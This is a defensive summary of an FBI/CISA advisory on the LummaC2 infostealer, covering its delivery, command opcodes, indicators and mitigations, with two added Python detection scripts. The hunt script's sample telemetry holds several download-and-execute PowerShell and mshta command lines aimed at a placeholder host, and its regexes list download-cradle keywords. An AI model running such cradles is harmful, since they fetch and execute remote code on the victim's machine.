The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have released a joint advisory on the LummaC2 information stealer (infostealer). LummaC2 infiltrates networks to exfiltrate sensitive information from individuals and organizations, including organizations in U.S. critical infrastructure sectors. The FBI observed LummaC2 activity as recently as May 2025, and the indicators of compromise (IOCs) in the advisory span November 2023 to May 2025.
Overview
LummaC2 first surfaced on Russian-language cybercriminal forums in 2022. It is commonly delivered through spearphishing with malicious hyperlinks and attachments. A second delivery path relies on the victim rather than an exploit: a fake CAPTCHA page instructs the user to copy a command and run it themselves, and that command launches PowerShell, which fetches and executes the malware. LummaC2 is also distributed inside counterfeit copies of popular software, and the payload is obfuscated, so defenses that rely on file signatures alone frequently miss it.
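The paste-and-run chain described above leaves a recognizable shape in process-creation telemetry. Assuming the victim pastes the command into the Windows Run dialog, as such lures usually instruct, the interpreter is spawned with explorer.exe as its parent, and the command line typically hides the window, disables the profile, and pulls a remote script. The hunt below is an added example for this summary, not code from the advisory or from the FBI or CISA: the events are constructed, the host captcha-check.invalid is a placeholder, and the indicators are generic paste-and-run heuristics rather than LummaC2 signatures.

```python
"""Hunt for ClickFix-style "paste this command" executions in process-creation
telemetry. Added example for this summary, not code from the FBI/CISA advisory:
events are constructed, captcha-check.invalid is a placeholder host, and the
indicators are generic paste-and-run heuristics, not LummaC2 signatures."""
from __future__ import annotations

import base64
import ntpath
import re
from dataclasses import dataclass

# Interpreters a lure would have the victim launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|invoke-restmethod|"
                                  r"downloadstring|downloadfile|curl|wget)\b", re.I),
    "inline_eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\s+\S*https?://", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def _encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(command_line: str) -> str | None:
    """Plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    image: str
    reasons: list[str]
    decoded: str | None


def analyze_event(event: dict) -> Finding | None:
    """Flag a script interpreter whose parent is explorer.exe (the Run dialog's
    host process) and whose command line shows paste-and-run indicators.
    Either half alone is noisy: users open PowerShell from the Start menu
    (explorer parent, no indicators) and build tools run PowerShell with
    -NoProfile (indicators, other parent). Together they are the lure's shape."""
    image = ntpath.basename(event["image"]).lower()
    if image not in INTERPRETERS:
        return None
    if ntpath.basename(event["parent_image"]).lower() != "explorer.exe":
        return None
    text = event["command_line"]
    reasons = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded_command")
        text = f"{text} {decoded}"  # inspect the decoded script as well
    reasons += [name for name, rx in INDICATORS.items() if rx.search(text)]
    if not reasons:
        return None
    return Finding(event["ts"], event["host"], event["user"], image, reasons, decoded)


def hunt(events: list[dict]) -> list[Finding]:
    return [f for f in map(analyze_event, events) if f is not None]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample telemetry (fields as an EDR or Sysmon Event ID 1 export supplies them).
SAMPLE_EVENTS = [
    {"ts": "2025-05-01T09:12:03Z", "host": "WS01", "user": "alice", "parent_image": EXPLORER,
     "image": PS, "command_line": 'powershell -w hidden -nop -c "iex (iwr -UseBasicParsing '
                                  'http://captcha-check.invalid/verify.txt)"'},
    {"ts": "2025-05-01T09:15:44Z", "host": "WS02", "user": "bob", "parent_image": EXPLORER,
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://captcha-check.invalid/v.hta"},
    {"ts": "2025-05-01T10:02:10Z", "host": "WS03", "user": "carol",
     "parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe", "image": PS,
     "command_line": "powershell -NoProfile -ExecutionPolicy Bypass -File build.ps1"},
    {"ts": "2025-05-01T10:30:51Z", "host": "WS01", "user": "alice", "parent_image": EXPLORER,
     "image": PS, "command_line": "powershell -EncodedCommand "
                                  + _encode_ps("IEX (iwr http://captcha-check.invalid/p)")},
    {"ts": "2025-05-01T11:00:00Z", "host": "WS04", "user": "dave", "parent_image": EXPLORER,
     "image": PS, "command_line": "powershell"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.ts} {f.host} {f.user} {f.image}: {', '.join(f.reasons)}")
        if f.decoded:
            print(f"    decoded: {f.decoded}")
```

Run stand-alone, the hunt flags the three constructed lure executions (including the one whose cradle is hidden behind -EncodedCommand, which is decoded before matching) and ignores both the developer's build script and the user who simply opened PowerShell. In production the same logic runs over your EDR or Sysmon process-creation feed; add the Run dialog's RunMRU registry history to the triage if you want the pasted text itself.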
Once running, LummaC2 quietly harvests sensitive data such as personally identifiable information, financial data, and multifactor authentication (MFA) details. Demand for the stolen data is substantial: more than 21,000 listings of LummaC2 logs were observed on criminal marketplaces between April and June 2024.
Technical Insights
The LummaC2 executable starts in a main routine that calls several sub-routines to establish communication with command and control (C2) servers, collect user- and host-specific data, and carry out the theft operations. The malware does not write the collected data to disk; gathering and transmission to the C2 server happen in memory. The practical consequence for defenders is that file-based artifacts are sparse, so detection has to lean on process, memory, and network telemetry rather than on scanning dropped files.
Key command types identified include:
- Opcode 0 – Generic Data Theft: file collection with operator-customizable fields that control what is gathered.
- Opcodes 1 and 2 – Browser Data Theft: targeted commands for stealing data from a range of browsers (excluding Mozilla).
- Opcode 3 – Remote File Download: downloads an additional file and executes it, which lets the stealer act as a loader for follow-on payloads.
- Screenshot Capture Command: takes screenshots and uploads them to the C2 server.
- Self-Deletion Command: removes the malware from the host when specified conditions are met.
Indicators of Compromise (IOCs)
The advisory compiles IOCs including hashes of LummaC2 executables, DLL binaries, and domains that served the malware. It cautions organizations to investigate or vet the listed domains before taking action such as blocking, because an indicator may be stale or shared with legitimate infrastructure.
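Turning an advisory's indicator list into something an analyst can act on is mostly plumbing: refang the published values, match domains on label boundaries so a lookalike suffix does not produce a false hit, and route the hits to a triage queue rather than straight to a block list, as the caveat above asks. The script below is an added example for this summary, not code from the advisory; the IOC values, DNS log lines and file inventory are constructed placeholders (reserved .invalid domains and a hash of an arbitrary byte string), so the real indicators must be taken from the advisory itself.

```python
"""Match an advisory IOC list against local telemetry and produce a triage list.
Added example for this summary, not code from the FBI/CISA advisory. IOCs, DNS
log lines and file inventory are constructed placeholders, not real indicators."""
from __future__ import annotations

import hashlib
import re
from urllib.parse import urlparse

# Placeholder hash derived from constructed bytes, so nothing here is a real sample.
SAMPLE_SHA256 = hashlib.sha256(b"constructed sample payload, not real malware").hexdigest()

# Constructed IOC feed in the defanged style advisories often use ("hxxp", "[.]").
IOC_FEED = f"""\
# domains (placeholders on the reserved .invalid TLD)
lumma-c2-a[.]invalid
cdn[.]lumma-c2-b[.]invalid
hxxps://lumma-c2-c[.]invalid/api
# sha256
{SAMPLE_SHA256}
"""

# Constructed resolver log: "<ts> <host> <qname> <qtype>"
DNS_LOG = """\
2025-05-02T08:00:01Z WS01 lumma-c2-a.invalid A
2025-05-02T08:00:07Z WS02 static.cdn.lumma-c2-b.invalid A
2025-05-02T08:00:09Z WS03 notlumma-c2-a.invalid A
2025-05-02T08:01:00Z WS04 update.example.com A
"""

# Constructed endpoint inventory: (host, path, sha256)
FILE_INVENTORY = [
    ("WS01", r"C:\Users\alice\Downloads\setup.exe", SAMPLE_SHA256),
    ("WS04", r"C:\Windows\System32\notepad.exe",
     hashlib.sha256(b"some benign file").hexdigest()),
]

HEX64 = re.compile(r"^[0-9a-f]{64}$")


def refang(value: str) -> str:
    """Undo common defanging: [.] and (.) for dots, hxxp(s) for http(s)."""
    value = value.strip().replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", value, flags=re.I)


def parse_ioc_feed(feed: str) -> dict[str, set[str]]:
    """Split a mixed feed into normalized domain and SHA-256 sets. URLs are
    reduced to their hostname; comments and blank lines are skipped."""
    iocs: dict[str, set[str]] = {"domains": set(), "sha256": set()}
    for raw in feed.splitlines():
        line = refang(raw)
        if not line or line.startswith("#"):
            continue
        if HEX64.match(line.lower()):
            iocs["sha256"].add(line.lower())
        elif "://" in line:
            host = urlparse(line).hostname
            if host:
                iocs["domains"].add(host.lower())
        else:
            iocs["domains"].add(line.lower().rstrip("."))
    return iocs


def domain_matches(observed: str, ioc: str) -> str | None:
    """'exact', 'subdomain', or None. Compares on label boundaries, so
    'notlumma-c2-a.invalid' does not match 'lumma-c2-a.invalid' the way a
    plain endswith() would."""
    observed = observed.lower().rstrip(".")
    if observed == ioc:
        return "exact"
    if observed.endswith("." + ioc):
        return "subdomain"
    return None


def triage(feed: str, dns_log: str, inventory: list[tuple[str, str, str]]) -> dict:
    """Return what to investigate. Domain hits are queued for vetting, not
    pushed straight to a block list, matching the advisory's caveat."""
    iocs = parse_ioc_feed(feed)
    domain_hits, hash_hits = [], []
    for line in dns_log.splitlines():
        ts, host, qname, _qtype = line.split()
        for ioc in sorted(iocs["domains"]):
            kind = domain_matches(qname, ioc)
            if kind:
                domain_hits.append({"ts": ts, "host": host, "observed": qname, "ioc": ioc,
                                    "match": kind, "action": "vet before blocking"})
    for host, path, digest in inventory:
        if digest.lower() in iocs["sha256"]:
            hash_hits.append({"host": host, "path": path, "sha256": digest,
                              "action": "investigate host"})
    return {"domain_hits": domain_hits, "hash_hits": hash_hits}


if __name__ == "__main__":
    for section, hits in triage(IOC_FEED, DNS_LOG, FILE_INVENTORY).items():
        print(section)
        for hit in hits:
            print("  ", hit)
```

The suffix check is the part worth keeping: WS02's query for a subdomain of a listed domain is reported as a subdomain match, while WS03's lookalike `notlumma-c2-a.invalid` is correctly ignored. Hash matches against an endpoint inventory are higher confidence than DNS hits and are reported separately so the two are not triaged the same way.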
MITRE ATT&CK Framework Alignment
The advisory employs the MITRE ATT&CK Matrix, mapping LummaC2’s behavior to specific techniques, including:
- Initial Access: phishing campaigns that deliver the malware.
- Defense Evasion: obfuscation of the payload to bypass detection.
- Discovery: enumeration of user and host information.
- Collection: automated harvesting of the targeted data.
- Command and Control: communication with the C2 servers after compromise.
- Exfiltration: transfer of the collected data to the threat actors without raising alerts.
Recommended Mitigations
The FBI and CISA strongly recommend that organizations adopt specific measures to reduce the risk from LummaC2; these align with the Cross-Sector Cybersecurity Performance Goals. Key measures include:
- User Account Separation: separate standard and administrative accounts and grant permissions by role, following least privilege.
- Monitoring Behavior: detect anomalies through log review and process monitoring, which matters all the more because the stealer leaves few file artifacts.
- Application Controls: restrict which software and scripts are allowed to execute.
- Phishing Defense: enforce multifactor authentication and train users to recognize phishing. Because LummaC2 also targets MFA details, MFA reduces but does not eliminate the impact of stolen credentials.
- Regular Updates: keep systems patched to minimize exploitable vulnerabilities.
- Network Segmentation: isolate sensitive data and systems to limit what a compromised host can reach.
Organizations are also encouraged to test their security controls continually against the MITRE ATT&CK techniques identified in the advisory, so that gaps are found before an intrusion exposes them.
Reporting Protocol
Organizations are not obligated to report to the FBI or CISA, but those willing to do so can share the status, scope, and specifics of infections to strengthen the community's collective defense.
The advisory is a practical resource for understanding the LummaC2 threat and for implementing defenses that protect sensitive data across critical infrastructure sectors.